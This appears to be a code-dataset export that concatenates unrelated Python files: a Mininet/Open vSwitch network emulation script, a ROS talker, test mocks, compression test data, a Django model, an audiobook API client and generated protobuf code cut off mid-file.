content
stringlengths 5
1.05M
|
|---|
#!/usr/bin/python
'''
TOPOLOGY USED IN NETSOFT 2015 TEST
Emulation of l3-scenario for the OpenStack case. Nodes:
- Host VM-User1: one interface
- Host VM-User2: one interface
- Host DPI: 2 interfaces
- Host WAN Accelerator (WANA): 2 interfaces (eth0 connected to s1 and eth1 connected to s2)
- Host TC: 2 interfaces (eth0 connected to s1 and eth1 connected to s2)
- Host GW: 2 interfaces
- Host VR: 2 interfaces
- Host h1: one interfaces
- Two Open vSwitch
1) sudo python test-l3-scenario.py
'''
from mininet.net import Mininet
from mininet.node import Node
from mininet.node import Host
from mininet.link import TCLink
from mininet.link import Intf
from mininet.log import setLogLevel, info
from mininet.cli import CLI
from mininet.node import Controller
from mininet.node import RemoteController
from mininet.util import quietRun
from time import sleep
import os
import sys
def defineNetwork():
if len(sys.argv) < 2:
print "Missing paramenter: python test-l2-scenario.py <debug=1|0>"
sys.exit()
#commento
debug = sys.argv[1] #print some useful information
info("*** Create an empty network and add nodes and switch to it *** \n")
net = Mininet(controller=RemoteController, link=TCLink, build=False, xterms=True) #MyPOXController
info("\n*** Adding Controller: Controller will be external *** \n")
#Creazione Open vSwitch
info("\n*** Creating Switch *** \n")
s1 = net.addSwitch('s1')
s1.cmd( 'ovs-vsctl del-br ' + s1.name )
s1.cmd( 'ovs-vsctl add-br ' + s1.name )
s1.cmd( 'ovs-vsctl set Bridge '+ s1.name + ' stp_enable=false protocols=OpenFlow13' ) # Disabling STP
s2 = net.addSwitch('s2')
s2.cmd( 'ovs-vsctl del-br ' + s2.name )
s2.cmd( 'ovs-vsctl add-br ' + s2.name )
s2.cmd( 'ovs-vsctl set Bridge '+ s2.name + ' stp_enable=false protocols=OpenFlow13' ) # Disabling STP
#Creazione Host
info("\n*** Creating VM-User 1 *** \n")
vmu1 = net.addHost('VMU1')
info("\n*** Creating VM-User 2 *** \n")
vmu2 = net.addHost('VMU2')
info("\n*** Creating DPI *** \n")
dpi = net.addHost('DPI')
info("\n*** Creating WAN A. *** \n")
wana = net.addHost('WANA')
info("\n*** Creating TC *** \n")
tc = net.addHost('TC')
info("\n*** Creating GateWay *** \n")
gw = net.addHost('GW')
info("\n*** Creating Virtual Router *** \n")
vr = net.addHost('VR')
info("\n*** Creating External Host *** \n")
h1 = net.addHost('H1')
info("\n*** Creating Links *** \n")
#Creazione Link
net.addLink(vmu1, s1, bw=100)
net.addLink(vmu2, s1, bw=100)
net.addLink(dpi, s1, bw=100)
net.addLink(dpi, s2, bw=100)
net.addLink(wana, s1, bw=100)
net.addLink(wana, s2, bw=100)
net.addLink(tc, s1, bw=100)
net.addLink(tc, s2, bw=100)
net.addLink(gw, s1, bw=100)
net.addLink(gw, s2, bw=100)
net.addLink(vr, s2, bw=100)
net.addLink(vr, h1, bw=100)
#Trying to assign MAC address to each node of the topology
vmu1.setMAC("00:00:00:00:00:01", vmu1.name + "-eth0")
vmu2.setMAC("00:00:00:00:00:02", vmu2.name + "-eth0")
dpi.setMAC("00:00:00:00:00:03", dpi.name + "-eth0")
dpi.setMAC("00:00:00:00:00:04", dpi.name + "-eth1")
wana.setMAC("00:00:00:00:00:05", wana.name + "-eth0")
wana.setMAC("00:00:00:00:00:06", wana.name + "-eth1")
tc.setMAC("00:00:00:00:00:07", tc.name + "-eth0")
tc.setMAC("00:00:00:00:00:08", tc.name + "-eth1")
gw.setMAC("00:00:00:00:00:09", gw.name + "-eth0")
gw.setMAC("00:00:00:00:00:0A", gw.name + "-eth1")
vr.setMAC("00:00:00:00:00:0B", vr.name + "-eth0")
vr.setMAC("00:00:00:00:00:0C", vr.name + "-eth1")
h1.setMAC("00:00:00:00:00:0D", h1.name + "-eth0")
#Disabling IPv6
info('\n*** Disabling IPv6 ...\n')
vmu1.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
vmu1.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
vmu1.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
vmu2.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
vmu2.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
vmu2.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
dpi.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
dpi.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
dpi.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
wana.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
wana.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
wana.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
tc.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
tc.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
tc.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
gw.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
gw.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
gw.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
vr.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
vr.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
vr.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
h1.cmd('sysctl -w net.ipv6.conf.all.disable_ipv6=1')
h1.cmd('sysctl -w net.ipv6.conf.default.disable_ipv6=1')
h1.cmd('sysctl -w net.ipv6.conf.lo.disable_ipv6=1')
#Aggiunta interfacce agli switch
info('\n*** Adding interfaces to switches ***\n')
for intf in s1.intfs.values():
s1.cmd( 'ovs-vsctl add-port ' + s1.name + ' %s' % intf )
print "Eseguito comando: ovs-vsctl add-port s1 ", intf
for intf in s2.intfs.values():
s2.cmd( 'ovs-vsctl add-port ' + s2.name + ' %s' % intf )
print "Eseguito comando: ovs-vsctl add-port s2 ", intf
info("\n*** Starting Network using Open vSwitch and remote controller*** \n")
# Creating a Linux Bridge on each host
nhosts = len(net.hosts)
print 'Total number of hosts: ' + str(nhosts)
count = 1
#net.build() #Allow to build xterm for each node
net.start()
#Configurazione Open vSwitch al protocollo 1.3
s1.cmd( 'ovs-vsctl set bridge ' + s1.name + ' protocols=OpenFlow13') #OpenFlow 1.3
s2.cmd( 'ovs-vsctl set bridge ' + s2.name + ' protocols=OpenFlow13') #OpenFlow 1.3
# Set the controller for the switch
print "Switch name: ", s1.name, s2.name
s1.cmd('ovs-vsctl set-controller ' + s1.name + ' tcp:127.0.0.1:6633')
s2.cmd('ovs-vsctl set-controller ' + s2.name + ' tcp:127.0.0.1:6633')
info( '\n*** Waiting for switch to connect to controller' )
while 'is_connected' not in quietRun( 'ovs-vsctl show' ):
sleep( 1 )
info( '.' )
info('\n')
#IP Configuration
info('\n*** Going to take down default configuration ...\n')
info('\n*** ... and configuring interfaces \n')
for host in net.hosts:
print 'Deleting ip address on ' + host.name + '-eth0 interface ...'
host.cmd('ip addr del ' + host.IP(host.name + '-eth0') + '/8 dev ' + host.name + '-eth0')
print 'Deleting entry in IP routing table on ' + host.name
host.cmd('ip route del 10.0.0.0/8')
print "Going to configure new IP"
if host.name == 'VMU1' or host.name == 'VMU2' :
host.setIP("10.10.10." + str(count), 24, host.name + "-eth0")
print "[CURRENT-CHECK] IP eth0: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth0')
elif host.name == 'DPI' or host.name == 'WANA' or host.name == 'TC' or host.name == 'GW' :
host.setIP("10.10.10." + str(count), 24, host.name + "-eth0")
print "[CURRENT-CHECK] IP eth0: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth0')
host.setIP("10.20.20." + str(count-2), 24, host.name + "-eth1")
print "[CURRENT-CHECK] IP eth1: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth1')
host.cmd('sysctl -w net.ipv4.ip_forward=1')
print "IP Forwarding enabled!"
elif host.name == 'H1':
host.setIP("10.0.0." + str(count + 1), 30, host.name + '-eth0')
print "[CURRENT-CHECK] H1 IP eth0: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth0')
net.hosts[count - 2].setIP("10.0.0." + str(count + 2), 30, net.hosts[count - 2].name + "-eth1")
print net.hosts[count - 2].name + "-eth1 interface has been configured!"
print "[Checking VR IP] eth1: " + net.hosts[count - 2].IP('VR-eth1')
net.hosts[count - 2].cmd('sysctl -w net.ipv4.ip_forward=1')
print "On VR node: IP Forwarding enabled!"
else:
host.setIP("10.20.20." + str(count-2), 24, host.name + "-eth0")
print "[CURRENT-CHECK] IP eth0: " + net.hosts[count - 1].IP(net.hosts[count - 1].name + '-eth0')
count = count + 1
print "\n"
#Gateway Configuration
print "Configuring gateway on each host.."
count=1
for host in net.hosts:
print "Adding gateway ..."
if host.name == 'VMU1' or host.name == 'VMU2' :
host.setDefaultRoute('dev ' + host.name + '-eth0 via ' + net.hosts[nhosts - 3].IP(net.hosts[nhosts - 3].name + '-eth0'))
elif host.name == 'VR' :
host.setDefaultRoute('dev ' + host.name + '-eth0 via ' + net.hosts[nhosts - 3].IP(net.hosts[nhosts - 3].name + '-eth1'))
elif host.name == 'GW' :
host.setDefaultRoute('dev ' + host.name + '-eth1 via ' + net.hosts[nhosts - 2].IP(net.hosts[nhosts - 2].name + '-eth0'))
elif host.name == 'H1' :
host.setDefaultRoute('dev ' + host.name + '-eth0 via ' + net.hosts[nhosts - 2].IP(net.hosts[nhosts - 2].name + '-eth1'))
elif host.name == 'DPI' or host.name == 'WANA' or host.name == 'TC' :
host.cmd('route add -net 10.0.0.8 netmask 255.255.255.252 gw 10.20.20.5')
#installing TrafficShaper on TC
info('\n*** Installing TrafficShaper on TC\n')
tc.cmd('tc qdisc del dev TC-eth1 root')
tc.cmd('tc qdisc add dev TC-eth1 root handle 1: cbq avpkt 1000 bandwidth 1000mbit')
tc.cmd('tc class add dev TC-eth1 parent 1: classid 1:1 cbq rate 10mbit allot 1500 prio 5 bounded')
tc.cmd('tc filter add dev TC-eth1 parent 1: protocol ip prio 16 u32 match ip dst 10.0.0.9 flowid 1:1')
tc.cmd('tc qdisc add dev TC-eth1 parent 1:1 sfq perturb 10')
#Modalita' di debug
if debug:
print "******************** DEBUG MODE ON ********************"
print "[SWITCH] ", s1, " Number of interfaces is ", len(s1.intfs)
print "[SWITCH] ", s2, " Number of interfaces is ", len(s2.intfs)
print "List of hosts:"
for host in net.hosts:
info( host.name + '\n' )
print "[HOST " + host.name + " - Interfaces]"
print host.cmd('ip a')
print "[HOST " + host.name + " - Routing table]"
print host.cmd('route -n')
print "[HOST " + host.name + " - IPv6 status]"
print host.cmd('cat /proc/sys/net/ipv6/conf/all/disable_ipv6')
info('... running CLI \n***')
CLI(net)
info('\n')
info('... stopping Network ***\n')
net.stop()
#Main
if __name__ == '__main__':
setLogLevel('info')
defineNetwork()
|
#!/usr/bin/env python
import rospy
import requests
from std_msgs.msg import String
import random
from geometry_msgs.msg import Twist
import xavier_command
def talker():
initi = True
pub = rospy.Publisher('command', String, queue_size=10)
rospy.init_node('letterTalkerS', anonymous=True)
rate = rospy.Rate(1) # 1hz
while not rospy.is_shutdown():
something = raw_input()
pub.publish(something)
rate.sleep()
if __name__ == '__main__':
try:
talker()
car_publisher = rospy.Publisher('command', String, queue_size=10)
decoy = xavier_command.STOP
car_publisher.publish(decoy)
except rospy.ROSInterruptException:
car_publisher = rospy.Publisher('command', String, queue_size=10)
decoy = xavier_command.STOP
car_publisher.publish(decoy)
pass
|
#!/usr/bin/env python3
# vim: fileencoding=utf-8 expandtab ts=4 nospell
# SPDX-FileCopyrightText: 2020-2021 Benedict Harcourt <ben.harcourt@harcourtprogramming.co.uk>
#
# SPDX-License-Identifier: BSD-2-Clause
"""
Abstract class and Model implementation for basic Tables in the ORM system.
Tables store an array of fields.
"""
from __future__ import annotations
from typing import Any, Callable, Dict, Optional, Tuple, Type, TypeVar
import unittest
Target = TypeVar("Target")
class CallableMock:
"""Mocking class that can accept any fuction call"""
testcase: unittest.TestCase
next_function: str
response: Any
args: Tuple[Any, ...]
kwargs: Dict[str, Any]
def __init__(self, test: unittest.TestCase) -> None:
self.testcase = test
self.next_function = ""
self.response = None
self.args = tuple()
self.kwargs = dict()
def expect(self, function: str, response: Any, *args: Any, **kwargs: Any) -> None:
"""Sets up what the next function call this Mock should expect next"""
self.next_function = function
self.response = response
self.args = args
self.kwargs = kwargs
def __getattr__(self, name: str) -> Optional[Callable[[Any], Any]]:
expected = self.next_function
self.testcase.assertEqual(
expected, name, f"Mock was not expecting a call to '{name}'"
)
return self.magic_call
def magic_call(self, *args: Any, **kwargs: Any) -> Any:
"""Fakes a call to the given function"""
self.testcase.assertEqual(self.args, args)
self.testcase.assertEqual(self.kwargs, kwargs)
return self.response
def cast(self, target: Type[Target]) -> Target:
"""'Casts' this object to a given type, to make type checkers ignore it."""
if not target:
raise ValueError("Missing type")
return self # type: ignore
class MarkerObject:
"""Unique objects for testing with. Equal instantiated object will be unique"""
_counter: int = 0
marker: int
def __init__(self) -> None:
MarkerObject._counter += 1
self.marker = MarkerObject._counter
def __eq__(self, other: Any) -> bool:
"""Check if this is object is equal"""
if not isinstance(other, MarkerObject):
return False
return self.marker == other.marker
def cast(self, target: Type[Target]) -> Target:
"""'Casts' this object to a given type, to make type checkers ignore it."""
if not target:
raise ValueError("Missing type")
return self # type: ignore
|
TEXT = b"""
Overhead the albatross hangs motionless upon the air
And deep beneath the rolling waves in labyrinths of coral caves
The echo of a distant tide
Comes willowing across the sand
And everything is green and submarine
And no one showed us to the land
And no one knows the wheres or whys
But something stirs and something tries
And starts to climb towards the light
Strangers passing in the street
By chance two separate glances meet
And I am you and what I see is me
And do I take you by the hand
And lead you through the land
And help me understand the best I can
And no one calls us to move on
And no one forces down our eyes
No one speaks
And no one tries
No one flies around the sun
...
Echoes - Pink Floyd
"""
# Compression parameters:
# window_sz2 - 11
# lookahead_sz2 - 4
COMPRESSED = (
b'\x85S\xee\xd6[\x95\xa2\xcba\xb2H.\x96\x8b,\x82\xc3l\xb1Xn\x97+}\xce\xe7 '
b'\xb4Xm\xd6{\x9c\x82\xdbo\xbaZm\xf6\xebe\x94\x04\n\xebp\xb7\xdb\x80\x8dm7'
b'(U\x06\xddd\x90Y,\xb6[\x84\x82\xc5e\xb7Yl7K@\x0c%\xca\xdfl\xb6Zm\xd6y'
b'\x05\xde\xc3v\xb2\xdc\xe4\x16\x9bt\x82\xd9a\xb1^nV\x9bu\xd2\xd1s\x90['
b'\xec\xd2\x0b\x1d\xbe\xe5a\xb6H,`8p\xaa\xa0\x17\x15\x96\xc7h\xb7\x80\xb9'
b'\xd8d\x16KM\xce\xe9a\xb7]$\x17KM\x92\xcb\n\xa1\xdb\xed\xa0zW{M\xb2\xd9o'
b'\xbb\x82i\xd8la\x1e\x80\xc0w;\r\xba\xc8\x0fIe\x0b2\xbc\xdd-\x00<v\x9b'
b'\x9c\x82\xcfr\xb2\xd9m\xd2\x00\x1b)\x05\xce\xebb\xb6\xd8A\xc4\xac\xb0'
b'\xa0&Kp/\x95\xb8\r\x8a\xd1o\xbb\xd9l\x92\x0b\xa8"\x15\xbc\x11\xd2\xd8'
b'\x08\xee\x04\rk\xb7[\xee\xe0\xc2\xb7{E\x96\xe4\x0f\xa5o\xb9\x00I^np\xaa'
b'\x15\xd6\xe9 \xb9\x84y\x03R\xdc\xee\x96\x9b\x95\xcc\x19\xd4\x04\xe2\xe9r'
b'\xb4\x86q\x02Y\x86\x11\\\xae\x80\xc4\x96;e\xa6\xdbb\x00\x82\xbb\xd8nV@V'
b'[e\xa6\xcfh\xbaB\xa1U;\xa5\xc8UJ\xca\x08\x85p\xb0\xdc\xeeaz\x82\xa4\xb7;'
b'\xa0a\x15\xd2\x15B\xbc\xc8,b\xeeV;,\x82\xe9w\xb7\xc8.v[\x85\x86\xe5a'
b'\xbaYd\x16p\xaf+\x18J\x95\xb4\x08\xcc\x1a\x8e\x93 \xb0\xdbd\x17\x9b}\xd4"'
b'\xd2\xefh\xb0\xdd\x00D\xaev[(\x85\x9d\xb6\xca3ko\x01"\xbaXmvP&K\x15\xe4'
b'\x19P\x16\x88=\x96\xd8=\xc6\x03\x07t\xb4\\\xad\xf7[8\xde\xa8\x8aE\xa2'
b'\xcbl\xb8\x029H.\xb6\xeb U\x10\xcc\x11\r-\x8a\xcbs\x06s\xb1\xd8m\xc2uv;'
b'\r\xb2\xd8Cd\x1e\xe9m\xb7\xdd\xac\xa0(@=vk}\xc8.N\xc9o\xbb\xdb\xa4\x16'
b'\xfb\xad\xcaAe\xbc\x89iS\x86Y\xae\x16[\r\xacN\xd4\x0bXS\x14\x07\x9a\xcdl'
b'\x00\xc2\x90XB\x80\x82\x01\xaew[t*\x15.\x97K\xa1P\xaa)\x1c\x90\r\x94'
b'\xb6AP\xb4\xdb\xadr\n5\xb2\xdfy\xb2B\x80'
)
|
from django.conf import settings
from django.db import models
from django.utils import timezone
class CardPlacementUserManager(models.Manager):
def all(self, user):
"""Returns all card placements belonging to the user
"""
return self.filter(user=user).all()
def get(self, user, *args, **kwargs):
"""Returns a card placement belonging to the user
"""
return self.filter(user=user).get(*args, **kwargs)
class CardPlacementCardManager(models.Manager):
def all(self, card):
"""Returns all card placements belonging to a card
"""
return self.filter(card=card).all()
def get(self, card, *args, **kwargs):
"""Returns a card placement belonging to a card
"""
return self.filter(card=card).get(*args, **kwargs)
class CardPlacementCardUserManager(models.Manager):
def get(self, card, user, *args, **kwargs):
"""Returns a card placement belonging to a card and the user
"""
return self.filter(card=card, user=user).get(*args, **kwargs)
class CardPlacement(models.Model):
AREA_CHOICES = (
(1, '1'),
(2, '2'),
(3, '3'),
(4, '4'),
(5, '5'),
(6, '6'),
)
area = models.IntegerField(default=1, choices=AREA_CHOICES, verbose_name='Area')
card = models.ForeignKey('cards.Card', on_delete=models.CASCADE, related_name='card_placements')
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
last_interaction = models.DateTimeField(auto_now_add=True, blank=True, editable=False)
postpone_until = models.DateTimeField(default=timezone.now, blank=True)
objects = models.Manager()
user_objects = CardPlacementUserManager()
card_objects = CardPlacementCardManager()
card_user_objects = CardPlacementCardUserManager()
class Meta:
unique_together = (('card', 'user'),)
ordering = ['area']
indexes = [
models.Index(fields=['user']),
models.Index(fields=['card']),
]
def move_forward(self):
"""Increase the area
"""
if self.area < 6:
self.area += 1
self.save()
def move_backward(self):
"""Decrease the area
"""
if self.area > 1:
self.area -= 1
self.save()
def reset(self):
"""Set card to area 1
"""
self.area = 1
self.save()
def set_last_interaction(self, last_interaction=False):
"""Set date and time of last interaction
"""
if not last_interaction:
last_interaction = timezone.now()
self.last_interaction = last_interaction
self.save()
def postponed(self):
"""Return true if card has been postponed
"""
if self.postpone_until > timezone.now():
return True
else:
return False
def expedite(self):
"""Reset postpone marker
"""
self.postpone_until = timezone.now()
self.save()
|
import audiolibrix
import hmac
import requests
from hashlib import sha256
class Auth:
def __init__(self):
if (
not isinstance(audiolibrix.api_credentials, tuple)
or len(audiolibrix.api_credentials) != 2
):
raise audiolibrix.error.APIError(
"Invalid credentials to Audiolibrix service provided (expected "
"two-part tuple with `client_id` and `shared_secret`)."
)
def sign(self, message):
return (
hmac.new(
audiolibrix.api_credentials[1].encode("utf-8"),
message.encode("utf-8"),
sha256,
)
.hexdigest()
.upper()
)
class Requestor:
def request(
self,
url,
data=[],
params=[],
method="GET",
signature_base="",
timeout=None,
):
headers = {
"x-merchantapi-merchant": audiolibrix.api_credentials[0],
"User-Agent": "audiolibrix-python/" + audiolibrix.VERSION,
"Accept": "application/json",
}
if method.upper() == "POST":
headers["Content-Type"] = "application/json"
if signature_base != "":
data["Signature"] = Auth().sign(signature_base)
elif method.upper() == "GET":
if signature_base != "":
params["signature"] = Auth().sign(signature_base)
try:
response = requests.request(
method=method,
url=audiolibrix.API_ENDPOINT + url,
headers=headers,
json=data,
params=params,
timeout=timeout
if timeout
else audiolibrix.default_request_timeout,
)
except Exception as e:
self._handle_request_error(e)
try:
data = response.json()
except ValueError:
raise audiolibrix.error.APIError(
"Improperly structured JSON that cannot be read: %s "
"(HTTP status code %s)"
% (response.text, response.status_code),
response.text,
)
try:
items = data["data"]
except (KeyError, TypeError):
try:
error = data["error"]
except (KeyError):
raise audiolibrix.error.APIError(
"Invalid error response object from API: %s"
% response.text,
response.text,
)
if error["id"] == "InvalidSignature":
raise audiolibrix.error.InvalidRequestError(
"Incorrect signature", response.text
)
elif error["id"] == "UnknownMerchant":
raise audiolibrix.error.InvalidAuthorizationError(
"Authorization information incorrect or missing",
response.text,
)
elif error["id"] == "NotFound":
raise audiolibrix.error.NotFoundError(
"Requested item not found or does not exist", response.text
)
elif error["id"] == "NoItems":
raise audiolibrix.error.InvalidRequestError(
"No items to be bought", response.text
)
elif error["id"] == "InvalidEmail":
raise audiolibrix.error.InvalidRequestError(
"Buyer's e-mail address invalid or missing", response.text
)
elif error["id"] == "InvalidOrderId":
raise audiolibrix.error.InvalidRequestError(
"Merchant's e-mail address invalid or missing",
response.text,
)
elif error["id"] == "ItemsNotFound":
raise audiolibrix.error.InvalidRequestError(
"Following items are not found: %s"
% ", ".join([str(item) for item in error["items"]]),
response.text,
)
elif error["id"] == "ItemsNotForSale":
raise audiolibrix.error.InvalidRequestError(
"Following items are not for sale: %s"
% ", ".join([str(item) for item in error["items"]]),
response.text,
)
elif error["id"] == "OrderMismatch":
raise audiolibrix.error.InvalidRequestError(
"Order with the same merchant identifier already exists, but "
"contains different items: %s"
% ", ".join([str(item) for item in error["items"]]),
response.text,
)
elif error["id"] == "OrderNotFound":
raise audiolibrix.error.NotFoundError(
"Order not found or does not exist", response.text
)
else:
raise audiolibrix.error.APIError(
"Unknown error occurred, try again later", response.text
)
return items
def _handle_request_error(self, e):
if isinstance(e, requests.exceptions.RequestException):
err = "%s: %s" % (type(e).__name__, str(e))
else:
err = "A %s was raised" % (type(e).__name__,)
if str(e):
err += " with error message %s" % (str(e),)
else:
err += " with no error message"
msg = "Network error: %s" % (err,)
raise audiolibrix.error.APIConnectionError(msg)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: dc.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='dc.proto',
package='',
syntax='proto3',
serialized_pb=_b('\n\x08\x64\x63.proto\"\\\n\x07Request\x12\r\n\x05genes\x18\x02 \x03(\t\x12\x10\n\x08ontology\x18\x01 \x01(\t\x12\x0e\n\x06growth\x18\x03 \x01(\x08\x12\x0e\n\x06npaths\x18\x04 \x01(\x05\x12\x10\n\x08request1\x18\x05 \x01(\x01\"3\n\x05Reply\x12\x14\n\x05nodes\x18\x03 \x03(\x0b\x32\x05.Node\x12\x14\n\x05\x65\x64ges\x18\x04 \x03(\x0b\x32\x05.Edge\"\xa5\x01\n\x04Node\x12\n\n\x02id\x18\x01 \x01(\t\x12\n\n\x02gi\x18\x02 \x01(\x01\x12\r\n\x05state\x18\x03 \x01(\x01\x12\x0f\n\x07neurons\x18\x04 \x03(\x01\x12\x1f\n\ncoordinate\x18\x05 \x01(\x0b\x32\x0b.Coordinate\x12\x0e\n\x06growth\x18\x06 \x01(\x01\x12\x10\n\x08\x66\x65\x61ture1\x18\x07 \x01(\t\x12\x10\n\x08\x66\x65\x61ture2\x18\x08 \x01(\x01\x12\x10\n\x08\x66\x65\x61ture3\x18\t \x01(\x01\"\"\n\nCoordinate\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\"~\n\x04\x45\x64ge\x12\x0e\n\x06source\x18\x01 \x01(\t\x12\x0e\n\x06target\x18\x02 \x01(\t\x12\x12\n\nimportance\x18\x03 \x01(\x05\x12\x0c\n\x04type\x18\x04 \x01(\x05\x12\x10\n\x08\x66\x65\x61ture1\x18\x05 \x01(\t\x12\x10\n\x08\x66\x65\x61ture2\x18\x06 \x01(\x01\x12\x10\n\x08\x66\x65\x61ture3\x18\x07 \x01(\x01\x32%\n\x08\x44\x65\x65pCell\x12\x19\n\x03Run\x12\x08.Request\x1a\x06.Reply\"\x00\x62\x06proto3')
)
_REQUEST = _descriptor.Descriptor(
name='Request',
full_name='Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='genes', full_name='Request.genes', index=0,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ontology', full_name='Request.ontology', index=1,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='growth', full_name='Request.growth', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='npaths', full_name='Request.npaths', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='request1', full_name='Request.request1', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=12,
serialized_end=104,
)
_REPLY = _descriptor.Descriptor(
name='Reply',
full_name='Reply',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='nodes', full_name='Reply.nodes', index=0,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='edges', full_name='Reply.edges', index=1,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=106,
serialized_end=157,
)
_NODE = _descriptor.Descriptor(
name='Node',
full_name='Node',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='Node.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gi', full_name='Node.gi', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='state', full_name='Node.state', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='neurons', full_name='Node.neurons', index=3,
number=4, type=1, cpp_type=5, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='coordinate', full_name='Node.coordinate', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='growth', full_name='Node.growth', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature1', full_name='Node.feature1', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature2', full_name='Node.feature2', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature3', full_name='Node.feature3', index=8,
number=9, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=160,
serialized_end=325,
)
_COORDINATE = _descriptor.Descriptor(
name='Coordinate',
full_name='Coordinate',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
